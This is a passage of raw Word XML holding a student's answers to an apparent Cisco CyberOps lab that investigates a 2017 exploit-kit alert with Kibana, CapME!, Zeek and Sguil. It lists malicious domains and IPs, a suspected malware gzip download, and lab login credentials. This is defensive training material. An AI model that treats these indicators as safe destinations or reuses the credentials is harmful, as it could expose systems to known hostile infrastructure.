          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476C62CF">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="240"/>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After use Kibana get this details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24178661">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="240"/>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Look at the expanded alert details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358AEF49">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="180"/>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 xml:space="preserve">first detected NIDS alert in Kibana   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Jan 27, 2017 – 22:54:43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0A9844">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">source IP address in the alert      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>172.16.4.193</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67802CE3">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">the destination IP address in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>alert</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>194.87.234.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B46E58B">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">the destination port in thealert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  service is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E0E09C">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>the classification of the alert  trojan activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331595B7">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>the destination geo country name Russia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1D6D89">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A001BBB">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>View the Transcript capME!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61348B2E">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>248285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="1733550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21363"/>
                <wp:lineTo x="21488" y="21363"/>
                <wp:lineTo x="21488" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="17" name="Picture 17" descr="screenshot of alert _id highlighted in the first NIDS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of alert _id highlighted in the first NIDS log entry"/>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733550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CC5108">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344D7A45">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>In the CapME! window you can see the transcript from the session. It shows the transactions between the source computer, in blue, and the destinations that are accessed by the source. A lot of valuable information, including a link to the pcap file that is related to this alert, is available in the transcript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B588528">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>130810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5078095" cy="3454400"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21441"/>
                <wp:lineTo x="21554" y="21441"/>
                <wp:lineTo x="21554" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="19" name="Picture 19" descr="screenshot of transcript for the first NIDS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of transcript for the first NIDS alert."/>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78095" cy="3454400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF90C13">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465105C0">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">website did the user intend to connect to  </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.homeimprovement.com" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>www.homeimprovement.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D567037">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">The URL did the browser refer the user to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>ty.benme.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681BC32C">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">kind of content is requested by the source host from tybenme.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>The content is shown as gzip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A9ECC8">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1B5CFC">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>This could be a malware file that has been requested for download. It is probably a malware file. Because it is compressed, the contents of the file are obfuscated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CAD58A">
      <w:pPr>
        <w:pStyle w:val="41"/>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From the top of the NIDS Alert Dashboard click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> entry located under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Zeek Hunting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> heading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506EC621">
      <w:pPr>
        <w:pStyle w:val="41"/>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n the HTTP dashboard, verify that your absolute time range includes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>2017-01-27 22:54:30.000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>2017-01-27 22:56:00.000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B3C644">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Scroll down to the HTTP - Sites section of the dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD3B2DA">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC9F638">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>websites that are listed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F7A22D">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>www.bing.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>p27dokhpz2n7nvgr.1jw2lx.top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>homeimprovement.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>tyu.benme.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>www.google-analytics.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>api.blockcipher.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>spotsbill.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>fpdownload2.macromedia.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
        </w:rPr>
        <w:t>retrotip.visionurbana.com.ve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54157E66">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:left="660"/>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Investigate the Exploit with Sguil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EF807">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="480"/>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Open Sguil and locate the alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089E10BE">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>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 xml:space="preserve">Launch Sguil from the desktop. Login with username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> and password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>cyberops</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">. Enable all sensors and click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F50797">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>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Locate the group of alerts from January 27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D30F907">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>According to Sguil the timestamps for the first and last of the alerts that occurred within about a second of each other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE8531">
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>22:54:42 to 22:55:28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8882F">
      <w:pPr>
        <w:pStyle w:val="5"/>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Investigate the alerts in Sguil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D462051">
